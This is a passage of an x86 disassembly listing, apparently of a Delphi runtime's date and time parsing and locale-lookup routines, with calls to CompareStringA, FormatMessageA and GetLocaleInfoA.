loc_40009FBA: ; CODE XREF: sub_40009F74+3F�j
lea eax, [ebp+var_14]
push eax
mov edx, [ebp+var_8]
mov edx, [edx]
mov ecx, esi
mov eax, [ebp+var_4]
call sub_40004DA8
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov esi, ebx
test esi, esi
jz short loc_40009FDE
sub esi, 4
mov esi, [esi]
loc_40009FDE: ; CODE XREF: sub_40009F74+63�j
mov edi, [ebp+var_10]
test edi, edi
jz short loc_40009FEA
sub edi, 4
mov edi, [edi]
loc_40009FEA: ; CODE XREF: sub_40009F74+6F�j
push edi
mov eax, [ebp+var_10]
call sub_40004D48
push eax
push esi
mov eax, ebx
call sub_40004D48
push eax
push 1
push 400h
call sub_400064F8 ; CompareStringA
sub eax, 2
test eax, eax
jnz short loc_4000A024
mov eax, ebx
test eax, eax
jz short loc_4000A01B
sub eax, 4
mov eax, [eax]
loc_4000A01B: ; CODE XREF: sub_40009F74+A0�j
mov edx, [ebp+var_8]
add [edx], eax
mov [ebp+var_9], 1
loc_4000A024: ; CODE XREF: sub_40009F74+2A�j
; sub_40009F74+9A�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000A041
loc_4000A031: ; CODE XREF: sub_40009F74+CB�j
lea eax, [ebp+var_14]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000A03A: ; DATA XREF: sub_40009F74+19�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000A031
; ---------------------------------------------------------------------------
loc_4000A041: ; CODE XREF: sub_40009F74+C5�j
; DATA XREF: sub_40009F74+B8�o
movzx eax, [ebp+var_9]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40009F74 endp
; =============== S U B R O U T I N E =======================================
sub_4000A04C proc near ; CODE XREF: sub_4000A1CC+D1�p
; sub_4000A1CC+101�p ...
var_10 = byte ptr -10h
push ebx
push esi
push edi
push ecx
mov [esp+10h+var_10], cl
mov edi, edx
mov esi, eax
xor ebx, ebx
mov edx, edi
mov eax, esi
call sub_40009EBC
mov eax, esi
test eax, eax
jz short loc_4000A06D
sub eax, 4
mov eax, [eax]
loc_4000A06D: ; CODE XREF: sub_4000A04C+1A�j
cmp eax, [edi]
jl short loc_4000A081
mov eax, [edi]
movzx eax, byte ptr [esi+eax-1]
cmp al, [esp+10h+var_10]
jnz short loc_4000A081
inc dword ptr [edi]
mov bl, 1
loc_4000A081: ; CODE XREF: sub_4000A04C+23�j
; sub_4000A04C+2F�j
mov eax, ebx
pop edx
pop edi
pop esi
pop ebx
retn
sub_4000A04C endp
; =============== S U B R O U T I N E =======================================
sub_4000A088 proc near ; CODE XREF: sub_4000A1CC+47�p
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
mov edi, 1
jmp short loc_4000A0C0
; ---------------------------------------------------------------------------
loc_4000A096: ; CODE XREF: sub_4000A088+41�j
movzx eax, byte ptr [esi+edi-1]
and al, 0DFh
sub al, 44h
jz short loc_4000A0BB
dec al
jz short loc_4000A0AF
sub al, 8
jz short loc_4000A0B7
sub al, 0Ch
jz short loc_4000A0B3
jmp short loc_4000A0BF
; ---------------------------------------------------------------------------
loc_4000A0AF: ; CODE XREF: sub_4000A088+1B�j
mov bl, 2
jmp short loc_4000A0CD
; ---------------------------------------------------------------------------
loc_4000A0B3: ; CODE XREF: sub_4000A088+23�j
mov bl, 2
jmp short loc_4000A0CD
; ---------------------------------------------------------------------------
loc_4000A0B7: ; CODE XREF: sub_4000A088+1F�j
xor ebx, ebx
jmp short loc_4000A0CD
; ---------------------------------------------------------------------------
loc_4000A0BB: ; CODE XREF: sub_4000A088+17�j
mov bl, 1
jmp short loc_4000A0CD
; ---------------------------------------------------------------------------
loc_4000A0BF: ; CODE XREF: sub_4000A088+25�j
inc edi
loc_4000A0C0: ; CODE XREF: sub_4000A088+C�j
mov eax, esi
call sub_40004B44
cmp edi, eax
jle short loc_4000A096
xor ebx, ebx
loc_4000A0CD: ; CODE XREF: sub_4000A088+29�j
; sub_4000A088+2D�j ...
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_4000A088 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000A0D4 proc near ; CODE XREF: sub_4000A1CC+62�p
; sub_4000A1CC+25F�p
push ebx
push esi
mov ebx, edx
mov esi, eax
jmp short loc_4000A0FE
; ---------------------------------------------------------------------------
loc_4000A0DC: ; CODE XREF: sub_4000A0D4+40�j
mov eax, [ebx]
movzx eax, byte ptr [esi+eax-1]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000A0FC
mov edx, [ebx]
mov eax, esi
call sub_4000BBC0
mov [ebx], eax
jmp short loc_4000A0FE
; ---------------------------------------------------------------------------
loc_4000A0FC: ; CODE XREF: sub_4000A0D4+19�j
inc dword ptr [ebx]
loc_4000A0FE: ; CODE XREF: sub_4000A0D4+6�j
; sub_4000A0D4+26�j
mov eax, esi
call sub_40004B44
cmp eax, [ebx]
jl short loc_4000A116
mov eax, [ebx]
movzx eax, byte ptr [esi+eax-1]
add al, 0D0h
sub al, 0Ah
jnb short loc_4000A0DC
loc_4000A116: ; CODE XREF: sub_4000A0D4+33�j
pop esi
pop ebx
retn
sub_4000A0D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000A11C proc near ; CODE XREF: sub_4000A1CC+88�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebp, eax
xor eax, eax
mov [esp+14h+var_14], eax
mov edi, 7
mov ebx, offset dword_4001E8D8
mov esi, offset dword_4001E8F4
loc_4000A137: ; CODE XREF: sub_4000A11C+47�j
cmp dword ptr [ebx], 0
jz short loc_4000A165
mov eax, ebp
call sub_40004D48
push eax
mov eax, [ebx]
call sub_40004D48
pop edx
call sub_4000BC30
test eax, eax
jz short loc_4000A15C
mov eax, [esi]
mov [esp+14h+var_14], eax
jmp short loc_4000A165
; ---------------------------------------------------------------------------
loc_4000A15C: ; CODE XREF: sub_4000A11C+37�j
add esi, 4
add ebx, 4
dec edi
jnz short loc_4000A137
loc_4000A165: ; CODE XREF: sub_4000A11C+1E�j
; sub_4000A11C+3E�j
mov eax, [esp+14h+var_14]
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000A11C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000A170 proc near ; CODE XREF: sub_4000A1CC+195�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, eax
cmp ds:dword_4001E8CC, 12h
jnz short loc_4000A1B9
cmp ebx, 63h
jg short loc_4000A1A8
call sub_400092B0
movzx ecx, ax
mov eax, [ebp+arg_0]
mov eax, [eax-4]
cdq
xor eax, edx
sub eax, edx
add ecx, eax
mov eax, ecx
mov ecx, 64h
cdq
idiv ecx
imul eax, 64h
add ebx, eax
loc_4000A1A8: ; CODE XREF: sub_4000A170+12�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax-4], 0
jle short loc_4000A1BF
mov eax, [ebp+arg_0]
neg dword ptr [eax-4]
jmp short loc_4000A1BF
; ---------------------------------------------------------------------------
loc_4000A1B9: ; CODE XREF: sub_4000A170+D�j
mov eax, [ebp+arg_0]
dec dword ptr [eax-4]
loc_4000A1BF: ; CODE XREF: sub_4000A170+3F�j
; sub_4000A170+47�j
mov eax, [ebp+arg_0]
mov eax, [eax-4]
add eax, ebx
pop ebx
pop ebp
retn
sub_4000A170 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000A1CC proc near ; CODE XREF: sub_4000A710+14�p
; sub_4000A780+25�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], ebx
mov [ebp+var_20], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ecx
mov ebx, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_4000A4EE
push dword ptr fs:[eax]
mov fs:[eax], esp
xor edi, edi
mov [ebp+var_16], 0
mov [ebp+var_18], 0
mov [ebp+var_1C], 0
mov [ebp+var_D], 0
mov eax, ds:dword_4001E814
call sub_4000A088
mov [ebp+var_E], al
xor eax, eax
mov [ebp+var_4], eax
mov eax, ds:dword_4001E814
cmp byte ptr [eax], 67h
jnz short loc_4000A25E
mov edx, ebx
mov eax, esi
call sub_4000A0D4
lea eax, [ebp+var_20]
push eax
mov ecx, [ebx]
dec ecx
mov edx, 1
mov eax, esi
call sub_40004DA8
mov eax, [ebp+var_20]
lea edx, [ebp+var_8]
call sub_40007BF8
mov eax, [ebp+var_8]
call sub_4000A11C
mov [ebp+var_4], eax
jmp short loc_4000A27A
; ---------------------------------------------------------------------------
loc_4000A25E: ; CODE XREF: sub_4000A1CC+5C�j
mov edx, ds:dword_4001E814
mov eax, offset dword_4000A508
call sub_4000BBF8
test eax, eax
jle short loc_4000A27A
mov eax, ds:dword_4001E8F4
mov [ebp+var_4], eax
loc_4000A27A: ; CODE XREF: sub_4000A1CC+90�j
; sub_4000A1CC+A4�j
lea eax, [ebp+var_19]
push eax
lea ecx, [ebp+var_10]
mov edx, ebx
mov eax, esi
call sub_40009EE0
test al, al
jz loc_4000A4CB
mov edx, ebx
movzx ecx, ds:byte_4001E811
mov eax, esi
call sub_4000A04C
test al, al
jz loc_4000A4CB
lea eax, [ebp+var_1A]
push eax
lea ecx, [ebp+var_12]
mov edx, ebx
mov eax, esi
call sub_40009EE0
test al, al
jz loc_4000A4CB
mov edx, ebx
movzx ecx, ds:byte_4001E811
mov eax, esi
call sub_4000A04C
test al, al
jz loc_4000A3AC
lea eax, [ebp+var_1B]
push eax
lea ecx, [ebp+var_14]
mov edx, ebx
mov eax, esi
call sub_40009EE0
test al, al
jz loc_4000A4CB
movzx eax, [ebp+var_E]
sub al, 1
jb short loc_4000A302
jz short loc_4000A31F
dec al
jz short loc_4000A33C
jmp short loc_4000A357
; ---------------------------------------------------------------------------
loc_4000A302: ; CODE XREF: sub_4000A1CC+12C�j
movzx edi, [ebp+var_14]
movzx eax, [ebp+var_1B]
mov [ebp+var_1C], al
movzx eax, [ebp+var_10]
mov [ebp+var_16], ax
movzx eax, [ebp+var_12]
mov [ebp+var_18], ax
jmp short loc_4000A357
; ---------------------------------------------------------------------------
loc_4000A31F: ; CODE XREF: sub_4000A1CC+12E�j
movzx edi, [ebp+var_14]
movzx eax, [ebp+var_1B]
mov [ebp+var_1C], al
movzx eax, [ebp+var_12]
mov [ebp+var_16], ax
movzx eax, [ebp+var_10]
mov [ebp+var_18], ax
jmp short loc_4000A357
; ---------------------------------------------------------------------------
loc_4000A33C: ; CODE XREF: sub_4000A1CC+132�j
movzx edi, [ebp+var_10]
movzx eax, [ebp+var_19]
mov [ebp+var_1C], al
movzx eax, [ebp+var_12]
mov [ebp+var_16], ax
movzx eax, [ebp+var_14]
mov [ebp+var_18], ax
loc_4000A357: ; CODE XREF: sub_4000A1CC+134�j
; sub_4000A1CC+151�j ...
cmp [ebp+var_4], 0
jle short loc_4000A36B
push ebp
movzx eax, di
call sub_4000A170
pop ecx
mov edi, eax
jmp short loc_4000A3DB
; ---------------------------------------------------------------------------
loc_4000A36B: ; CODE XREF: sub_4000A1CC+18F�j
cmp [ebp+var_1C], 2
ja short loc_4000A3DB
call sub_400092B0
movzx ecx, ax
movzx eax, word_4001A7F8
sub ecx, eax
mov eax, ecx
push ecx
mov ecx, 64h
cdq
idiv ecx
pop ecx
imul ax, 64h
add di, ax
cmp word_4001A7F8, 0
jbe short loc_4000A3DB
movzx eax, di
cmp ecx, eax
jle short loc_4000A3DB
add di, 64h
jmp short loc_4000A3DB
; ---------------------------------------------------------------------------
loc_4000A3AC: ; CODE XREF: sub_4000A1CC+108�j
call sub_400092B0
mov edi, eax
cmp [ebp+var_E], 1
jnz short loc_4000A3CB
movzx eax, [ebp+var_10]
mov [ebp+var_18], ax
movzx eax, [ebp+var_12]
mov [ebp+var_16], ax
jmp short loc_4000A3DB
; ---------------------------------------------------------------------------
loc_4000A3CB: ; CODE XREF: sub_4000A1CC+1EB�j
movzx eax, [ebp+var_10]
mov [ebp+var_16], ax
movzx eax, [ebp+var_12]
mov [ebp+var_18], ax
loc_4000A3DB: ; CODE XREF: sub_4000A1CC+19D�j
; sub_4000A1CC+1A3�j ...
mov edx, ebx
movzx ecx, ds:byte_4001E811
mov eax, esi
call sub_4000A04C
mov edx, ebx
mov eax, esi
call sub_40009EBC
cmp byte ptr ds:dword_4001E8D4, 0
jz loc_4000A4B5
mov edx, ds:dword_4001E814
mov eax, offset dword_4000A514
call sub_40004E30
test eax, eax
jz loc_4000A4B5
mov eax, ds:dword_4001E828
movzx eax, byte ptr [eax]
add al, 0D0h
sub al, 0Ah
jnb short loc_4000A439
mov edx, ebx
mov eax, esi
call sub_4000A0D4
jmp loc_4000A4B5
; ---------------------------------------------------------------------------
jmp short loc_4000A439
; ---------------------------------------------------------------------------
loc_4000A437: ; CODE XREF: sub_4000A1CC+27F�j
inc dword ptr [ebx]
loc_4000A439: ; CODE XREF: sub_4000A1CC+259�j
; sub_4000A1CC+269�j ...
mov eax, esi
call sub_40004B44
cmp eax, [ebx]
jl short loc_4000A44D
mov eax, [ebx]
cmp byte ptr [esi+eax-1], 20h
jnz short loc_4000A437
loc_4000A44D: ; CODE XREF: sub_4000A1CC+276�j
mov edx, ebx
mov eax, esi
call sub_40009EBC
mov eax, esi
call sub_40004B44
cmp eax, [ebx]
jl short loc_4000A4B5
lea eax, [ebp+var_24]
push eax
mov eax, ds:dword_4001E820
call sub_40004B44
mov ecx, eax
mov edx, [ebx]
mov eax, esi
call sub_40004DA8
mov edx, [ebp+var_24]
mov eax, ds:dword_4001E820
call sub_40007BB4
test eax, eax
jz short loc_4000A4B5
lea eax, [ebp+var_28]
push eax
mov eax, ds:dword_4001E824
call sub_40004B44
mov ecx, eax
mov edx, [ebx]
mov eax, esi
call sub_40004DA8
mov edx, [ebp+var_28]
mov eax, ds:dword_4001E824
call sub_40007BB4
test eax, eax
jnz short loc_4000A439
loc_4000A4B5: ; CODE XREF: sub_4000A1CC+22F�j
; sub_4000A1CC+247�j ...
mov eax, [ebp+var_C]
push eax
movzx ecx, [ebp+var_18]
movzx edx, [ebp+var_16]
mov eax, edi
call sub_40009050
mov [ebp+var_D], al
loc_4000A4CB: ; CODE XREF: sub_4000A1CC+C0�j
; sub_4000A1CC+D8�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000A4F5
loc_4000A4D8: ; CODE XREF: sub_4000A1CC+327�j
lea eax, [ebp+var_28]
mov edx, 3
call sub_400048A8
lea eax, [ebp+var_8]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000A4EE: ; DATA XREF: sub_4000A1CC+21�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000A4D8
; ---------------------------------------------------------------------------
loc_4000A4F5: ; CODE XREF: sub_4000A1CC+321�j
; DATA XREF: sub_4000A1CC+307�o
movzx eax, [ebp+var_D]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000A1CC endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 1
dword_4000A508 dd 65h, 0FFFFFFFFh, 3dword_4000A514 dd 646464h
; =============== S U B R O U T I N E =======================================
sub_4000A518 proc near ; CODE XREF: sub_4000A748+14�p
; sub_4000A780+4E�p
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF0h
mov [esp+20h+var_20], ecx
mov esi, edx
mov ebp, eax
xor ebx, ebx
or edi, 0FFFFFFFFh
mov edx, esi
mov ecx, ds:dword_4001E820
mov eax, ebp
call sub_40009F74
test al, al
jnz short loc_4000A550
mov edx, esi
mov ecx, offset dword_4000A700
mov eax, ebp
call sub_40009F74
test al, al
jz short loc_4000A554
loc_4000A550: ; CODE XREF: sub_4000A518+24�j
xor edi, edi
jmp short loc_4000A57E
; ---------------------------------------------------------------------------
loc_4000A554: ; CODE XREF: sub_4000A518+36�j
mov edx, esi
mov ecx, ds:dword_4001E824
mov eax, ebp
call sub_40009F74
test al, al
jnz short loc_4000A579
mov edx, esi
mov ecx, offset dword_4000A70C
mov eax, ebp
call sub_40009F74
test al, al
jz short loc_4000A57E
loc_4000A579: ; CODE XREF: sub_4000A518+4D�j
mov edi, 0Ch
loc_4000A57E: ; CODE XREF: sub_4000A518+3A�j
; sub_4000A518+5F�j
test edi, edi
jl short loc_4000A58B
mov edx, esi
mov eax, ebp
call sub_40009EBC
loc_4000A58B: ; CODE XREF: sub_4000A518+68�j
lea eax, [esp+20h+var_14]
push eax
lea ecx, [esp+24h+var_1C]
mov edx, esi
mov eax, ebp
call sub_40009EE0
test al, al
jz loc_4000A6ED
mov [esp+20h+var_1A], 0
mov [esp+20h+var_18], 0
mov [esp+20h+var_16], 0
mov edx, esi
movzx ecx, ds:byte_4001E81C
mov eax, ebp
call sub_4000A04C
test al, al
jz short loc_4000A644
lea eax, [esp+20h+var_14]
push eax
lea ecx, [esp+24h+var_1A]
mov edx, esi
mov eax, ebp
call sub_40009EE0
test al, al
jz loc_4000A6ED
mov edx, esi
movzx ecx, ds:byte_4001E81C
mov eax, ebp
call sub_4000A04C
test al, al
jz short loc_4000A644
lea eax, [esp+20h+var_14]
push eax
lea ecx, [esp+24h+var_18]
mov edx, esi
mov eax, ebp
call sub_40009EE0
test al, al
jz loc_4000A6ED
mov edx, esi
movzx ecx, ds:byte_4001E80F
mov eax, ebp
call sub_4000A04C
test al, al
jz short loc_4000A644
lea eax, [esp+20h+var_14]
push eax
lea ecx, [esp+24h+var_16]
mov edx, esi
mov eax, ebp
call sub_40009EE0
test al, al
jz loc_4000A6ED
loc_4000A644: ; CODE XREF: sub_4000A518+B4�j
; sub_4000A518+E2�j ...
test edi, edi
jge short loc_4000A69B
mov edx, esi
mov ecx, ds:dword_4001E820
mov eax, ebp
call sub_40009F74
test al, al
jnz short loc_4000A66D
mov edx, esi
mov ecx, offset dword_4000A700
mov eax, ebp
call sub_40009F74
test al, al
jz short loc_4000A671
loc_4000A66D: ; CODE XREF: sub_4000A518+141�j
xor edi, edi
jmp short loc_4000A69B
; ---------------------------------------------------------------------------
loc_4000A671: ; CODE XREF: sub_4000A518+153�j
mov edx, esi
mov ecx, ds:dword_4001E824
mov eax, ebp
call sub_40009F74
test al, al
jnz short loc_4000A696
mov edx, esi
mov ecx, offset dword_4000A70C
mov eax, ebp
call sub_40009F74
test al, al
jz short loc_4000A69B
loc_4000A696: ; CODE XREF: sub_4000A518+16A�j
mov edi, 0Ch
loc_4000A69B: ; CODE XREF: sub_4000A518+12E�j
; sub_4000A518+157�j ...
test edi, edi
jl short loc_4000A6C3
cmp [esp+20h+var_1C], 0
jz short loc_4000A6ED
cmp [esp+20h+var_1C], 0Ch
ja short loc_4000A6ED
cmp [esp+20h+var_1C], 0Ch
jnz short loc_4000A6BE
mov [esp+20h+var_1C], 0
loc_4000A6BE: ; CODE XREF: sub_4000A518+19D�j
add [esp+20h+var_1C], di
loc_4000A6C3: ; CODE XREF: sub_4000A518+185�j
mov edx, esi
mov eax, ebp
call sub_40009EBC
movzx eax, [esp+20h+var_16]
push eax
mov eax, [esp+24h+var_20]
push eax
movzx ecx, [esp+28h+var_18]
movzx edx, [esp+28h+var_1A]
movzx eax, [esp+28h+var_1C]
call sub_40008F48
mov ebx, eax
loc_4000A6ED: ; CODE XREF: sub_4000A518+87�j
; sub_4000A518+CA�j ...
mov eax, ebx
add esp, 10h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000A518 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_4000A700 dd 4D41h, 0FFFFFFFFh, 2 ; sub_4000A518+145�o
dword_4000A70C dd 4D50h ; sub_4000A518+16E�o
; =============== S U B R O U T I N E =======================================
sub_4000A710 proc near ; CODE XREF: sub_40010874+69�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov esi, edx
mov ebx, eax
mov [esp+0Ch+var_C], 1
mov ecx, esi
mov edx, esp
mov eax, ebx
call sub_4000A1CC
test al, al
jz short loc_4000A740
mov eax, ebx
test eax, eax
jz short loc_4000A738
sub eax, 4
mov eax, [eax]
loc_4000A738: ; CODE XREF: sub_4000A710+21�j
cmp eax, [esp+0Ch+var_C]
setl al
jmp short loc_4000A742
; ---------------------------------------------------------------------------
loc_4000A740: ; CODE XREF: sub_4000A710+1B�j
xor eax, eax
loc_4000A742: ; CODE XREF: sub_4000A710+2E�j
pop edx
pop esi
pop ebx
retn
sub_4000A710 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000A748 proc near ; CODE XREF: sub_4000A780+5D�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov esi, edx
mov ebx, eax
mov [esp+0Ch+var_C], 1
mov ecx, esi
mov edx, esp
mov eax, ebx
call sub_4000A518
test al, al
jz short loc_4000A778
mov eax, ebx
test eax, eax
jz short loc_4000A770
sub eax, 4
mov eax, [eax]
loc_4000A770: ; CODE XREF: sub_4000A748+21�j
cmp eax, [esp+0Ch+var_C]
setl al
jmp short loc_4000A77A
; ---------------------------------------------------------------------------
loc_4000A778: ; CODE XREF: sub_4000A748+1B�j
xor eax, eax
loc_4000A77A: ; CODE XREF: sub_4000A748+2E�j
pop edx
pop esi
pop ebx
retn
sub_4000A748 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000A780 proc near ; CODE XREF: sub_4000CF90+35�p
var_24 = dword ptr -24h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
push ebx
push esi
push edi
add esp, 0FFFFFFE8h
mov edi, edx
mov esi, eax
mov bl, 1
mov [esp+24h+var_24], 1
xor eax, eax
mov dword ptr [esp+24h+var_14], eax
mov dword ptr [esp+24h+var_14+4], eax
lea ecx, [esp+24h+var_1C]
mov edx, esp
mov eax, esi
call sub_4000A1CC
test al, al
jnz short loc_4000A7B2
mov al, 1
jmp short loc_4000A7D5
; ---------------------------------------------------------------------------
loc_4000A7B2: ; CODE XREF: sub_4000A780+2C�j
mov eax, esi
test eax, eax
jz short loc_4000A7BD
sub eax, 4
mov eax, [eax]
loc_4000A7BD: ; CODE XREF: sub_4000A780+36�j
cmp eax, [esp+24h+var_24]
jge short loc_4000A7C6
mov al, 1
jmp short loc_4000A7D3
; ---------------------------------------------------------------------------
loc_4000A7C6: ; CODE XREF: sub_4000A780+40�j
lea ecx, [esp+24h+var_14]
mov edx, esp
mov eax, esi
call sub_4000A518
loc_4000A7D3: ; CODE XREF: sub_4000A780+44�j
xor al, 1
loc_4000A7D5: ; CODE XREF: sub_4000A780+30�j
test al, al
jz short loc_4000A7E6
mov edx, edi
mov eax, esi
call sub_4000A748
mov ebx, eax
jmp short loc_4000A80E
; ---------------------------------------------------------------------------
loc_4000A7E6: ; CODE XREF: sub_4000A780+57�j
fld [esp+24h+var_1C]
fcomp ds:flt_4000A818
fstsw ax
sahf
jb short loc_4000A803
fld [esp+24h+var_1C]
fadd [esp+24h+var_14]
fstp qword ptr [edi]
wait
jmp short loc_4000A80E
; ---------------------------------------------------------------------------
loc_4000A803: ; CODE XREF: sub_4000A780+74�j
fld [esp+24h+var_1C]
fsub [esp+24h+var_14]
fstp qword ptr [edi]
wait
loc_4000A80E: ; CODE XREF: sub_4000A780+64�j
; sub_4000A780+81�j
mov eax, ebx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_4000A780 endp
; ---------------------------------------------------------------------------
align 4
flt_4000A818 dd 0.0 ; DATA XREF: sub_4000A780+6A�r
; =============== S U B R O U T I N E =======================================
sub_4000A81C proc near ; CODE XREF: sub_4000C41C+2C�p
; sub_4000DDD4+1E7�p ...
var_105 = byte ptr -105h
var_104 = byte ptr -104h
push ebx
add esp, 0FFFFFF00h
mov ebx, edx
push 0
push 100h
lea edx, [esp+10Ch+var_104]
push edx
push 0
push eax
push 0
push 3200h
call sub_40006540 ; FormatMessageA
jmp short loc_4000A843
; ---------------------------------------------------------------------------
loc_4000A842: ; CODE XREF: sub_4000A81C+33�j
; sub_4000A81C+38�j
dec eax
loc_4000A843: ; CODE XREF: sub_4000A81C+24�j
test eax, eax
jle short loc_4000A856
movzx edx, [esp+eax+104h+var_105]
sub dl, 21h
jb short loc_4000A842
sub dl, 0Dh
jz short loc_4000A842
loc_4000A856: ; CODE XREF: sub_4000A81C+29�j
mov edx, esp
mov ecx, ebx
xchg eax, ecx
call sub_40004974
add esp, 100h
pop ebx
retn
sub_4000A81C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000A868 proc near ; CODE XREF: sub_4000A8E0+1C�p
; sub_4000AAF4+27�p ...
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFF00h
push ebx
push esi
mov esi, ecx
mov ebx, [ebp+arg_0]
push 100h
lea ecx, [ebp+var_100]
push ecx
push edx
push eax
call sub_40006590 ; GetLocaleInfoA
test eax, eax
jle short loc_4000A8A1
mov ecx, eax
dec ecx
lea edx, [ebp+var_100]
mov eax, ebx
call sub_40004974
jmp short loc_4000A8AA
; ---------------------------------------------------------------------------
loc_4000A8A1: ; CODE XREF: sub_4000A868+25�j
mov eax, ebx
mov edx, esi
call sub_400048D8
loc_4000A8AA: ; CODE XREF: sub_4000A868+37�j
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4000A868 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000A8B4 proc near ; CODE XREF: sub_4000BE64+AD�p
; sub_4000BE64+C0�p ...
var_10 = byte ptr -10h
push ebx
push esi
push edi
push ecx
mov ebx, ecx
mov esi, edx
mov edi, eax
push 2
lea eax, [esp+14h+var_10]
push eax
push esi
push edi
call sub_40006590 ; GetLocaleInfoA
test eax, eax
jle short loc_4000A8D6
movzx eax, [esp+10h+var_10]
jmp short loc_4000A8D8
; ---------------------------------------------------------------------------
loc_4000A8D6: ; CODE XREF: sub_4000A8B4+1A�j
mov eax, ebx
loc_4000A8D8: ; CODE XREF: sub_4000A8B4+20�j
pop edx
pop edi
pop esi
pop ebx
retn
sub_4000A8B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000A8E0 proc near ; CODE XREF: sub_4000A91C+46�p
; sub_4000A91C+69�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], ecx
mov edi, edx
mov esi, eax
mov ebx, [ebp+arg_0]
push ebx
mov eax, [ebp+arg_8]
mov eax, [eax-4]
xor ecx, ecx
mov edx, esi
call sub_4000A868
cmp dword ptr [ebx], 0
jnz short loc_4000A913
mov eax, [ebp+var_4]
mov eax, [eax+edi*4]
mov edx, ebx
call sub_400062F0
loc_4000A913: ; CODE XREF: sub_4000A8E0+24�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 8
sub_4000A8E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000A91C proc near ; CODE XREF: sub_4000BE64+23�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
xor eax, eax
push ebp
push offset loc_4000AA2F
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_400065C8 ; GetThreadLocale
mov [ebp+var_4], eax
mov ebx, 1
mov esi, offset dword_4001E830
mov edi, offset dword_4001E860
loc_4000A94F: ; CODE XREF: sub_4000A91C+83�j
push ebp
push 0Bh
lea eax, [ebp+var_C]
push eax
mov ecx, offset off_4001A884
mov edx, ebx
dec edx
lea eax, [ebx+44h]
dec eax
call sub_4000A8E0
pop ecx
mov edx, [ebp+var_C]
mov eax, esi
call sub_400048D8
push ebp
push 0Bh
lea eax, [ebp+var_10]
push eax
mov ecx, offset off_4001A8B4
mov edx, ebx
dec edx
lea eax, [ebx+38h]
dec eax
call sub_4000A8E0
pop ecx
mov edx, [ebp+var_10]
mov eax, edi
call sub_400048D8
inc ebx
add edi, 4
add esi, 4
cmp ebx, 0Dh
jnz short loc_4000A94F
mov ebx, 1
mov esi, offset dword_4001E890
mov edi, offset dword_4001E8AC
loc_4000A9B0: ; CODE XREF: sub_4000A91C+F6�j
lea eax, [ebx+5]
mov ecx, 7
cdq
idiv ecx
mov [ebp+var_8], edx
push ebp
push 6
lea eax, [ebp+var_14]
push eax
mov ecx, offset off_4001A8E4
mov edx, ebx
dec edx
mov eax, [ebp+var_8]
add eax, 31h
